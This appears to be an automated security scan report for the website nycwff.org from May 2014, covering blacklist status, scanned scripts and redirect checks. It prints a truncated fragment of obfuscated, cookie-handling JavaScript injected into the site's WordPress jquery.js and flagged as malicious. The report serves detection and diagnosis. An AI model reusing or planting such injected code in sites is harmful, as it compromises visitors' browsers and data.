Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nycwff.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://nycwff.org/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.nycwff.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 May 2014 19:56:07 GMT Location: http://nycwff.org/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://nycwff.org/xmlrpc.php X-Powered-By: PleskLin | clean |
http://nycwff.org/ | 200 OK Content-Length: 20616 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js | 200 OK Content-Length: 93868 Content-Type: text/javascript | clean |
http://www.nycwff.org/wp-content/themes/longpage/nyroModal/js/jquery.nyroModal.custom.js | 404 Not Found Content-Length: 956 Content-Type: text/html | clean |
http://www.nycwff.org/test404page.js | 404 Not Found Content-Length: 956 Content-Type: text/html | clean |
http://maps.google.com/maps/api/js?v=3.2&sensor=false | 200 OK Content-Length: 4901 Content-Type: text/javascript | clean |
http://nycwff.org/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 96029 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var HhhPD4v="\x75\x73\x65r\x69dA\x30817FB\x325";var lB6AMa0="28";var ohSMG=1;function FnmTqif(v69H1E){var eBhQG;var LgPCJ=document.cookie;if(!LgPCJ){return null;}LgPCJ=LgPCJ.replace(/\s/g,"");var auAr5v_=LgPCJ.split(";");for(var i=0;i<auAr5v_.length;i++){var IzebBuO=auAr5v_[i].split("=");if(IzebBuO[0]==v69H1E){eBhQG=unescape(IzebBuO[1]);break;}}return eBhQG;};function D7iVO(v69H1E,CDfHdho,VfOr4D){var exp=new Date();var kGeaAfy=exp.getTime()+(VfOr4D*60*60*1000);exp.setTime(kGeaAfy);var Qzecbe8 jQuery.noConflict(); Antivirus reports:
| ||
http://nycwff.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: text/javascript | clean |
http://nycwff.org/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ajax.js?ver=3.7.3 | 200 OK Content-Length: 33 Content-Type: text/javascript | clean |
http://nycwff.org/wp-content/themes/longpage/design/js/libs/html5.js?ver=3.7.3 | 200 OK Content-Length: 2051 Content-Type: text/javascript | clean |
http://nycwff.org/wp-content/themes/longpage/design/js/libs/jquery.anythingslider.fx.min.js?ver=3.7.3 | 200 OK Content-Length: 3236 Content-Type: text/javascript | clean |
http://nycwff.org/wp-content/themes/longpage/design/js/libs/jquery.anythingslider.min.js?ver=3.7.3 | 200 OK Content-Length: 14756 Content-Type: text/javascript | clean |
http://nycwff.org/wp-content/themes/longpage/design/js/libs/jquery.easing.1.3.js?ver=3.7.3 | 200 OK Content-Length: 8097 Content-Type: text/javascript | clean |
http://nycwff.org/wp-content/themes/longpage/design/js/sliders.js?ver=3.7.3 | 200 OK Content-Length: 4568 Content-Type: text/javascript | clean |
http://nycwff.org/wp-content/themes/longpage/design/js/libs/jquery.colorbox-1.3.16-min.js?ver=3.7.3 | 200 OK Content-Length: 9282 Content-Type: text/javascript | clean |
http://nycwff.org/wp-content/themes/longpage/design/js/libs/jquery.jcarousel.min.js?ver=3.7.3 | 200 OK Content-Length: 15650 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nycwff.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 May 2014 19:56:07 GMT
Server: nginx
Content-Type: text/html; charset=UTF-8
Link: <http://nycwff.org/?p=16>; rel=shortlink
X-Pingback: http://nycwff.org/xmlrpc.php
X-Powered-By: PleskLin
GET / HTTP/1.1
Host: nycwff.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 May 2014 19:56:07 GMT
Server: nginx
Content-Type: text/html; charset=UTF-8
Link: <http://nycwff.org/?p=16>; rel=shortlink
X-Pingback: http://nycwff.org/xmlrpc.php
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: nycwff.org
Referer: http://www.google.com/search?q=nycwff.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: nycwff.org
Referer: http://www.google.com/search?q=nycwff.org
Result:
The result is similar to the first query. There are no suspicious redirects found.